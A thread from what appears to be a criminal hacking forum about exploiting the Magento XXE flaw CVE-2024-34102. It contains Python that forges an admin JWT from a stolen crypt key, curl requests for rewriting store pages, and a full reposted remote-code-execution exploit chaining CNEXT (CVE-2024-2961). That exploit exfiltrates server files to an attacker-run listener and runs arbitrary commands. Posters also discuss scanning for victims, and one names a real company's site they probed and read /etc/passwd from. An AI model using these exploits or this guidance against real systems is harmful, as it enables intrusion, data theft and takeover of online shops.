-
XSS.stack #1 – первый литературный журнал от юзеров форума
Видео CVE-2024-34102 на примере
- Автор темы vagabond
- Дата начала
Я действительно должен сказать, что вы делаете очень хорошие видео, и мне они нравятся.
Hi there
sorry as i misunderstood , did you check for RCE using iconv BOF and found no way for it ?
also i think if phpmyadmin is closed on target , you can found JWT signature and make JWT token of admin for yourself , as writeups and magento env file show
Можно в теории еще связать с cve в glibc iconv() , но тоже не всегда. Больше интересует что делать если env.php нет на тачке
Where u can find jwt signature? Is it in env.php file? I think u mean hmac key or smth to create a signature, right?
Вайтхет чернеет? Я так понимаю просто можно куку админскую сгенерить. Эта вулна еще легко превращается в ssrf, до рце пока не смог добраться. Env.php у меня нет , т.к контейнер
hi
as grozdniyandy say you can find crypt key and using that to generate JWT signature on env that use for api or graphql
its in env.php and you can read there
about getting RCE : the vulnerability itself doesn't prove RCE availability right now , maybe you can chain to rest apis for uploading file or so on
but about chaining with other vuln, as the blackhand says, you can get a crash on the system using iconv, as you can see in the xxe exploit you request data with filters, and when running magento and checking glibc version its assume vulnerable
but generating a full exploit chain from this is not straightforward, you should flow the debugging process using a pair of magento docker and phpstorm to find a crash point and generate an overflow gadget base on availability in it
about changing pages and code block based on REST api token i think you could use 2 api :
first about /v1/cms page , send put request to this page to make change on pages :
Код:
curl --location --request PUT 'http://test.com/rest/default/V1/cmsPage/<string>' \
--header 'Content-Type: application/json' \
--data '{
"page": {
"identifier": "<string>",
"active": "<boolean>",
"content": "<string>",
"content_heading": "<string>",
"creation_time": "<string>",
"custom_layout_update_xml": "<string>",
"custom_root_template": "<string>",
"custom_theme": "<string>",
"custom_theme_from": "<string>",
"custom_theme_to": "<string>",
"id": "<integer>",
"layout_update_xml": "<string>",
"meta_description": "<string>",
"meta_keywords": "<string>",
"meta_title": "<string>",
"page_layout": "<string>",
"sort_order": "<string>",
"title": "<string>",
"update_time": "<string>"
}
}'In the other hand, you can edit the available blocks in Magento with the rest API, using this request:
Код:
curl --location --request PUT 'http://test.com/rest/default/V1/cmsBlock/<string>' \
--header 'Content-Type: application/json' \
--data '{
"block": {
"identifier": "<string>",
"active": "<boolean>",
"content": "<string>",
"creation_time": "<string>",
"id": "<integer>"
"title": "<string>",
"update_time": "<string>"
}'
}you can find available blocks before PUT request using get to the same endpoint
Последнее редактирование:
how do you scan for sites with these vulns?
Lots of automatic scanners available for this vuln.
You can use nucleic template for example
or create your own , as the vuln type is xxe and you can make OOB call to other servers you can easily write your own scanner
Nice ! Unfortunately iconv() exploit is impossible inside docker because usually you dont have permission to read /proc/self/maps
. Did u manage to generate jwt token for rest api?
I will describe it here maybe help someone :Nice ! Unfortunately iconv() exploit is impossible inside docker because usually you dont have permission to read /proc/self/maps
first read source of "app/code/Magento/JwtUserToken/etc/config.xml" file to find out signature algorithm
Also you read env.php file in the past and get the crypt key out of it .
Now it's time to generate JWT:
when you look at flow of generating token in app/code/Magento/JwtUserToken/Model/SecretBasedJwksFactory.php#createFor you will found something like this :
(the code i describe here is about version 2.4.7 , you may face some slightly different code )
Код:
$this->keys = preg_split('/\s+/s', trim((string)$deploymentConfig->get('crypt/key')));
//Making sure keys are large enough.
foreach ($this->keys as &$key) {
$key = str_pad($key, 2048, '&', STR_PAD_BOTH);
}as you see in code , if we use the crypt key from env.php file [$deploymentConfig->get('crypt/key')] use to generate JWT token
first it padded key and then use it for generating JWT token
we can use code like this for the version i said to generate your token :
Код:
import jwt
import datetime
iat = datetime.datetime.now()
exp = iat + datetime.timedelta(hours=1)
payload = {
"uid": 1,
"utypid": 2,
"iat": int(iat.timestamp()),
"exp": int(exp.timestamp())
}
headers = {
"kid": "1",
"alg": "HS256"
}
encoded_jwt = jwt.encode(payload, '&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&[replace with your crypt key]&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&', algorithm='HS256',headers=headers)
print(encoded_jwt)also you can replace the algorithm with the algo you found early
P.s : i think if you work on docker , you should deleted env.php in installation time , so you didnt have it to use crypt key , so work on live target
about iconv exploit : i think you can emulate the step to get the addresses and skip it manually to found and fix your payload first
then in live target use the target that you get and replace with placeholders
did you test this scenario ?
<1KNOX<1
I work around live target, but sometimes you face infrastructure based on k8s. Docker is used in prod
видеопродакшен топ
Hi
I think its better to Post this POC here , so we can have complete scenarios about the vuln in this topic
Achieve remote code execution in Magento using cnext vulnerability :
I think its better to Post this POC here , so we can have complete scenarios about the vuln in this topic
Achieve remote code execution in Magento using cnext vulnerability :
Python:
#!/usr/bin/env python3
#
# CNEXT (CVE-2024-2961) + CosmicSting (CVE-2024-34102): RCE on Magento 2.4.7
# Date: 2024-07-26
# Author: Charles FOL @cfreal_ (LEXFO/AMBIONICS)
#
# Credits to @SpaceWasp for finding the bug and the initial exploit, and to @nospherxd1
# for the `/` trick.
#
# REFERENCES
#
# - https://github.com/spacewasp/public_docs/blob/main/CVE-2024-34102.md
# - https://sansec.io/research/cosmicsting
# - https://www.corp.ambionics.io/blog/iconv-cve-2024-2961-p1
#
# REQUIREMENTS
#
# Requires ten: https://github.com/cfreal/ten
#
from __future__ import annotations
import base64
import zlib
from dataclasses import dataclass
from pwn import *
from requests.exceptions import ChunkedEncodingError, ConnectionError
from ten import *
from tenlib import logging
from functools import reduce
from rich.align import Align
import socket
LOCAL_IP = "172.28.0.1"
LOCAL_PORT = 8888
HEAP_SIZE = 2 * 1024 * 1024
BUG = "劄".encode("utf-8")
log = logger("EXPLOIT")
class Server:
keep_running: bool = True
data: bytes
def __init__(self) -> None:
self.local_url = f"http://{LOCAL_IP}:{LOCAL_PORT}"
self.server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
def send_response(self, client_socket: socket.socket, data: str) -> None:
"""Sends an HTTP response to the given client socket."""
response = f"HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: {len(data)}\r\n\r\n{data}"
client_socket.sendall(response.encode())
def handle(self, client_socket) -> None:
"""Receives an HTTP request and returns an HTTP response."""
packet = b""
while not packet.endswith(b"\r\n\r\n"):
packet += client_socket.recv(100000)
url = re.search(b"GET /(.*?) HTTP/1.1", packet).group(1)
url = url.decode()
self.data = None
match url.split("/", 1):
case "file", path:
path = base64.decode(path).decode()
log.info(f"Received file request for: {path[:100]}")
response = f"""\
<!ENTITY % data SYSTEM "{path}">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM '{self.local_url}/data/%data;'>">
"""
self.send_response(client_socket, response)
case "data", data:
data = base64.decode(data)
log.info(f"Received file response")
self.send_response(client_socket, b"")
self.data = data
case unknown:
failure(f"Unknown path: {unknown}")
client_socket.close()
def run(self) -> None:
self.server_socket.bind(("0.0.0.0", LOCAL_PORT))
self.server_socket.listen(5)
while True:
try:
client_socket, addr = self.server_socket.accept()
except:
log.info("Server stopped")
break
log.info(f"Accepted connection from {addr}")
self.handle(client_socket)
def start(self) -> None:
self._server_thread = threading.Thread(target=self.run)
self._server_thread.start()
def stop(self) -> None:
self.server_socket.shutdown(2)
self.server_socket.close()
self._server_thread.join()
class Remote:
"""A helper class to send the payload and download files.
The logic of the exploit is always the same, but the exploit needs to know how to
download files (/proc/self/maps and libc) and how to send the payload.
The code here serves as an example that attacks a page that looks like:
```php
<?php
$data = file_get_contents($_POST['file']);
echo "File contents: $data";
```
Tweak it to fit your target, and start the exploit.
"""
session: Session
server: Server
def __init__(self, url: str) -> None:
self.session = ScopedSession(url)
self.session.verify = False
self.server = Server()
self.server.start()
def send(self, path: str) -> Response:
"""Sends given `path` to the HTTP server. Returns the response."""
path = base64.encode(path)
return self.session.post(
"/rest/all/V1/guest-carts/test-ambio/estimate-shipping-methods",
json={
"address": {
"totalsReader": {
"collectorList": {
"totalCollector": {
"sourceData": {
"data": f'<?xml version="1.0" ?> <!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY % sp SYSTEM "{self.server.local_url}/file/{path}"> %sp; %param1; ]> <r>&exfil;</r>',
"options": 524290,
}
}
}
}
}
},
)
def download(self, path: str) -> bytes:
"""Returns the contents of a remote file."""
self.send(f"php://filter/convert.base64-encode/resource={path}")
assume(self.server.data, "Unable to dump remote file through XXE")
return self.server.data
@entry
@arg("url", "Target URL")
@arg("command", "Command to run on the system; limited to 0x140 bytes")
@arg("sleep_time", "Time to sleep to assert that the exploit worked. By default, 1.")
@arg("heap", "Address of the main zend_mm_heap structure.")
@arg(
"pad",
"Number of 0x100 chunks to pad with. If the website makes a lot of heap "
"operations with this size, increase this. Defaults to 20.",
)
@dataclass
class Exploit:
"""CNEXT exploit: RCE using a file read primitive in PHP."""
url: str
command: str
sleep: int = 1
heap: str = None
pad: int = 20
def __post_init__(self):
self.remote = Remote(self.url)
self.log = logger("EXPLOIT")
self.info = {}
self.heap = self.heap and int(self.heap, 16)
msg_print()
msg_print(Align.center("[b]Magento <= 2.4.7[/] Remote Code Execution"))
msg_print(Align.center("[i]CVE-2024-2961[/] + [i]CVE-2024-34102[/]"))
msg_print(Align.center("[b] CNEXT[/] + [b]CosmicSting[/]"))
msg_print()
def check_vulnerable(self) -> None:
"""Checks whether the target is reachable and properly allows for the various
wrappers and filters that the exploit needs.
"""
def safe_download(path: str) -> bytes:
try:
return self.remote.download(path)
except ConnectionError:
failure("Target not [b]reachable[/] ?")
def check_token(text: str, path: str) -> bool:
result = safe_download(path)
return text.encode() == result
text = tf.random.string(50).encode()
base64 = b64(text, misalign=True).decode()
path = f"data:text/plain;base64,{base64}"
result = safe_download(path)
if text not in result:
msg_failure("Remote.download did not return the test string")
print("--------------------")
print(f"Expected test string: {text}")
print(f"Got: {result}")
print("--------------------")
failure(
"If your code works fine, it means that the [i]data://[/] wrapper does not work"
)
msg_info("The [i]data://[/] wrapper works")
text = tf.random.string(50)
base64 = b64(text.encode(), misalign=True).decode()
path = f"php://filter//resource=data:text/plain;base64,{base64}"
if not check_token(text, path):
failure("The [i]php://filter/[/] wrapper does not work")
msg_info("The [i]php://filter/[/] wrapper works")
text = tf.random.string(50)
base64 = b64(compress(text.encode()), misalign=True).decode()
path = f"php://filter/zlib.inflate/resource=data:text/plain;base64,{base64}"
if not check_token(text, path):
failure("The [i]zlib[/] extension is not enabled")
msg_info("The [i]zlib[/] extension is enabled")
msg_success("Exploit preconditions are satisfied")
def get_file(self, path: str) -> bytes:
with msg_status(f"Downloading [i]{path}[/]..."):
return self.remote.download(path)
def get_regions(self) -> list[Region]:
"""Obtains the memory regions of the PHP process by querying /proc/self/maps."""
maps = self.get_file("/proc/self/maps")
maps = maps.decode()
PATTERN = re.compile(
r"^([a-f0-9]+)-([a-f0-9]+)\b" r".*" r"\s([-rwx]{3}[ps])\s" r"(.*)"
)
regions = []
for region in table.split(maps, strip=True):
if match := PATTERN.match(region):
start = int(match.group(1), 16)
stop = int(match.group(2), 16)
permissions = match.group(3)
path = match.group(4)
if "/" in path or "[" in path:
path = path.rsplit(" ", 1)[-1]
else:
path = ""
current = Region(start, stop, permissions, path)
regions.append(current)
else:
print(maps)
failure("Unable to parse memory mappings")
self.log.info(f"Got {len(regions)} memory regions")
return regions
def get_symbols_and_addresses(self) -> None:
"""Obtains useful symbols and addresses from the file read primitive."""
regions = self.get_regions()
LIBC_FILE = "/dev/shm/cnext-libc"
# PHP's heap
self.info["heap"] = self.heap or self.find_main_heap(regions)
# Libc
libc = self._get_region(regions, "libc-", "libc.so")
self.download_file(libc.path, LIBC_FILE)
self.info["libc"] = ELF(LIBC_FILE, checksec=False)
self.info["libc"].address = libc.start
def _get_region(self, regions: list[Region], *names: str) -> Region:
"""Returns the first region whose name matches one of the given names."""
for region in regions:
if any(name in region.path for name in names):
break
else:
failure("Unable to locate region")
return region
def download_file(self, remote_path: str, local_path: str) -> None:
"""Downloads `remote_path` to `local_path`"""
data = self.get_file(remote_path)
Path(local_path).write(data)
def find_main_heap(self, regions: list[Region]) -> Region:
# Any anonymous RW region with a size superior to the base heap size is a
# candidate. The heap is at the bottom of the region.
heaps = [
region.stop - HEAP_SIZE + 0x40
for region in reversed(regions)
if region.permissions == "rw-p"
and region.size >= HEAP_SIZE
and region.stop & (HEAP_SIZE - 1) == 0
and region.path == ""
]
if not heaps:
failure("Unable to find PHP's main heap in memory")
first = heaps[0]
if len(heaps) > 1:
heaps = ", ".join(map(hex, heaps))
# msg_info(f"Potential heaps: [i]{heaps}[/] (using first)")
else:
msg_info(f"Using [i]{hex(first)}[/] as heap")
return first
def run(self) -> None:
# self.check_vulnerable()
try:
self.get_symbols_and_addresses()
self.exploit()
finally:
self.remote.server.stop()
def build_exploit_path(self) -> str:
"""
On each step of the exploit, a filter will process each chunk one after the
other. Processing generally involves making some kind of operation either
on the chunk or in a destination chunk of the same size. Each operation is
applied on every single chunk; you cannot make PHP apply iconv on the first 10
chunks and leave the rest in place. That's where the difficulties come from.
Keep in mind that we know the address of the main heap, and the libraries.
ASLR/PIE do not matter here.
The idea is to use the bug to make the freelist for chunks of size 0x100 point
lower. For instance, we have the following free list:
... -> 0x7fffAABBCC900 -> 0x7fffAABBCCA00 -> 0x7fffAABBCCB00
By triggering the bug from chunk ..900, we get:
... -> 0x7fffAABBCCA00 -> 0x7fffAABBCCB48 -> ???
That's step 3.
Now, in order to control the free list, and make it point whereever we want,
we need to have previously put a pointer at address 0x7fffAABBCCB48. To do so,
we'd have to have allocated 0x7fffAABBCCB00 and set our pointer at offset 0x48.
That's step 2.
Now, if we were to perform step2 an then step3 without anything else, we'd have
a problem: after step2 has been processed, the free list goes bottom-up, like:
0x7fffAABBCCB00 -> 0x7fffAABBCCA00 -> 0x7fffAABBCC900
We need to go the other way around. That's why we have step 1: it just allocates
chunks. When they get freed, they reverse the free list. Now step2 allocates in
reverse order, and therefore after step2, chunks are in the correct order.
Another problem comes up.
To trigger the overflow in step3, we convert from UTF-8 to ISO-2022-CN-EXT.
Since step2 creates chunks that contain pointers and pointers are generally not
UTF-8, we cannot afford to have that conversion happen on the chunks of step2.
To avoid this, we put the chunks in step2 at the very end of the chain, and
prefix them with `0\n`. When dechunked (right before the iconv), they will
"disappear" from the chain, preserving them from the character set conversion
and saving us from an unwanted processing error that would stop the processing
chain.
After step3 we have a corrupted freelist with an arbitrary pointer into it. We
don't know the precise layout of the heap, but we know that at the top of the
heap resides a zend_mm_heap structure. We overwrite this structure in two ways.
Its free_slot[] array contains a pointer to each free list. By overwriting it,
we can make PHP allocate chunks whereever we want. In addition, its custom_heap
field contains pointers to hook functions for emalloc, efree, and erealloc
(similarly to malloc_hook, free_hook, etc. in the libc). We overwrite them and
then overwrite the use_custom_heap flag to make PHP use these function pointers
instead. We can now do our favorite CTF technique and get a call to
system(<chunk>).
We make sure that the "system" command kills the current process to avoid other
system() calls with random chunk data, leading to undefined behaviour.
The pad blocks just "pad" our allocations so that even if the heap of the
process is in a random state, we still get contiguous, in order chunks for our
exploit.
Therefore, the whole process described here CANNOT crash. Everything falls
perfectly in place, and nothing can get in the middle of our allocations.
"""
LIBC = self.info["libc"]
ADDR_EMALLOC = LIBC.symbols["__libc_malloc"]
ADDR_EFREE = LIBC.symbols["__libc_system"]
ADDR_EREALLOC = LIBC.symbols["__libc_realloc"]
ADDR_HEAP = self.info["heap"]
ADDR_FREE_SLOT = ADDR_HEAP + 0x20
ADDR_CUSTOM_HEAP = ADDR_HEAP + 0x0168
ADDR_FAKE_BIN = ADDR_FREE_SLOT - 0x10
CS = 0x100
# Pad needs to stay at size 0x100 at every step
pad_size = CS - 0x18
pad = b"\x00" * pad_size
pad = chunked_chunk(pad, len(pad) + 6)
pad = chunked_chunk(pad, len(pad) + 6)
pad = chunked_chunk(pad, len(pad) + 6)
pad = compressed_bucket(pad)
step1_size = 1
step1 = b"\x00" * step1_size
step1 = chunked_chunk(step1)
step1 = chunked_chunk(step1)
step1 = chunked_chunk(step1, CS)
step1 = compressed_bucket(step1)
# Since these chunks contain non-UTF-8 chars, we cannot let it get converted to
# ISO-2022-CN-EXT. We add a `0\n` that makes the 4th and last dechunk "crash"
step2_size = 0x48
step2 = b"\x00" * (step2_size + 8)
step2 = chunked_chunk(step2, CS)
step2 = chunked_chunk(step2)
step2 = compressed_bucket(step2)
step2_write_ptr = b"0\n".ljust(step2_size, b"\x00") + p64(ADDR_FAKE_BIN)
step2_write_ptr = chunked_chunk(step2_write_ptr, CS)
step2_write_ptr = chunked_chunk(step2_write_ptr)
step2_write_ptr = compressed_bucket(step2_write_ptr)
step3_size = CS
step3 = b"\x00" * step3_size
assert len(step3) == CS
step3 = chunked_chunk(step3)
step3 = chunked_chunk(step3)
step3 = chunked_chunk(step3)
step3 = compressed_bucket(step3)
step3_overflow = b"\x00" * (step3_size - len(BUG)) + BUG
assert len(step3_overflow) == CS
step3_overflow = chunked_chunk(step3_overflow)
step3_overflow = chunked_chunk(step3_overflow)
step3_overflow = chunked_chunk(step3_overflow)
step3_overflow = compressed_bucket(step3_overflow)
step4_size = CS
step4 = b"=00" + b"\x00" * (step4_size - 1)
step4 = chunked_chunk(step4)
step4 = chunked_chunk(step4)
step4 = chunked_chunk(step4)
step4 = compressed_bucket(step4)
# This chunk will eventually overwrite mm_heap->free_slot
# it is actually allocated 0x10 bytes BEFORE it, thus the two filler values
step4_pwn = ptr_bucket(
0x200000,
0,
# free_slot
0,
0,
ADDR_CUSTOM_HEAP, # 0x18
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
ADDR_HEAP, # 0x140
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
size=CS,
)
step4_custom_heap = ptr_bucket(
ADDR_EMALLOC, ADDR_EFREE, ADDR_EREALLOC, size=0x18
)
step4_use_custom_heap_size = 0x140
COMMAND = self.command
COMMAND = f"kill -9 $PPID; {COMMAND}"
if self.sleep:
COMMAND = f"sleep {self.sleep}; {COMMAND}"
COMMAND = COMMAND.encode() + b"\x00"
assert (
len(COMMAND) <= step4_use_custom_heap_size
), f"Command too big ({len(COMMAND)}), it must be strictly inferior to {hex(step4_use_custom_heap_size)}"
COMMAND = COMMAND.ljust(step4_use_custom_heap_size, b"\x00")
step4_use_custom_heap = COMMAND
step4_use_custom_heap = qpe(step4_use_custom_heap)
step4_use_custom_heap = chunked_chunk(step4_use_custom_heap)
step4_use_custom_heap = chunked_chunk(step4_use_custom_heap)
step4_use_custom_heap = chunked_chunk(step4_use_custom_heap)
step4_use_custom_heap = compressed_bucket(step4_use_custom_heap)
pages = (
step4 * 3
+ step4_pwn
+ step4_custom_heap
+ step4_use_custom_heap
+ step3_overflow
+ pad * self.pad
+ step1 * 3
+ step2_write_ptr
+ step2 * 2
)
resource = compress(compress(pages))
resource = b64(resource)
resource = f"data:text/plain;base64,{resource.decode()}"
filters = [
# Create buckets
"zlib.inflate",
"zlib.inflate",
# Step 0: Setup heap
"dechunk",
"convert.iconv.latin1.latin1",
# Step 1: Reverse FL order
"dechunk",
"convert.iconv.latin1.latin1",
# Step 2: Put fake pointer and make FL order back to normal
"dechunk",
"convert.iconv.latin1.latin1",
# Step 3: Trigger overflow
"dechunk",
"convert.iconv.UTF-8.ISO-2022-CN-EXT",
# Step 4: Allocate at arbitrary address and change zend_mm_heap
"convert.quoted-printable-decode",
"convert.iconv.latin1.latin1",
]
# Turns out, this is overcomplicated: one can just use `/` instead of `|`, as
# done by @nospherxd1
# path = reduce(lambda x, y: f"php://filter/{y}/resource={x}", filters, resource)
filters = "/".join(filters)
path = f"php://filter/{filters}/resource={resource}"
return path
@inform("Triggering...")
def exploit(self) -> None:
path = self.build_exploit_path()
start = time.time()
try:
self.remote.send(path)
except (ConnectionError, ChunkedEncodingError):
pass
msg_print()
if not self.sleep:
msg_print(
Align.center(
"[b white on black] EXPLOIT [/][b white on green] SUCCESS [/] [i](probably)[/]"
)
)
elif start + self.sleep <= time.time():
msg_print(
Align.center(
"[b white on black] EXPLOIT [/][b white on green] SUCCESS [/]"
)
)
else:
# Wrong heap, maybe? If the exploited suggested others, use them!
msg_print(
Align.center(
"[b white on black] EXPLOIT [/][b white on red] FAILURE [/]"
)
)
msg_print()
def compress(data) -> bytes:
"""Returns data suitable for `zlib.inflate`."""
# Remove 2-byte header and 4-byte checksum
return zlib.compress(data, 9)[2:-4]
def b64(data: bytes, misalign=True) -> bytes:
payload = base64.encode(data)
if not misalign and payload.endswith("="):
raise ValueError(f"Misaligned: {data}")
return payload.encode()
def compressed_bucket(data: bytes) -> bytes:
"""Returns a chunk of size 0x8000 that, when dechunked, returns the data."""
return chunked_chunk(data, 0x8000)
def qpe(data: bytes) -> bytes:
"""Emulates quoted-printable-encode."""
return "".join(f"={x:02x}" for x in data).upper().encode()
def ptr_bucket(*ptrs, size=None) -> bytes:
"""Creates a 0x8000 chunk that reveals pointers after every step has been ran."""
if size is not None:
assert len(ptrs) * 8 == size
bucket = b"".join(map(p64, ptrs))
bucket = qpe(bucket)
bucket = chunked_chunk(bucket)
bucket = chunked_chunk(bucket)
bucket = chunked_chunk(bucket)
bucket = compressed_bucket(bucket)
return bucket
def chunked_chunk(data: bytes, size: int = None) -> bytes:
"""Constructs a chunked representation of the given chunk. If size is given, the
chunked representation has size `size`.
For instance, `ABCD` with size 10 becomes: `0004\nABCD\n`.
"""
# The caller does not care about the size: let's just add 8, which is more than
# enough
if size is None:
size = len(data) + 8
keep = len(data) + len(b"\n\n")
size = f"{len(data):x}".rjust(size - keep, "0")
return size.encode() + b"\n" + data + b"\n"
@dataclass
class Region:
"""A memory region."""
start: int
stop: int
permissions: str
path: str
@property
def size(self) -> int:
return self.stop - self.start
Exploit()- Автор темы
- Добавить закладку
- #16
не могу не выложить. manfrotto.com Ну, многие пользуются. Есть уязвимость
/etc/passwd - вижу
/var/www/html/index.php - вижу
../app/etc/registration_globlist.php - вижу
../app/etc/env.php - Не вижу
Перебрал кучу вариантов. Глаз уже замылен. Может попробует кто
/etc/passwd - вижу
/var/www/html/index.php - вижу
../app/etc/registration_globlist.php - вижу
../app/etc/env.php - Не вижу
Перебрал кучу вариантов. Глаз уже замылен. Может попробует кто
../app/etc/ показывает список файлов в директории? expect:// заместо file работает ?
А разве ../app/etc/ может показать список?
Ну он уже не работает))
А какой options у тебя стоит? Должен быть LIBXML_PARSEHUGE ну естесно в цифровом виде
- Автор темы
- Добавить закладку
- #20
эх, уже потёр сервак где все это было. Сори, но не могу потестить всё что вы написали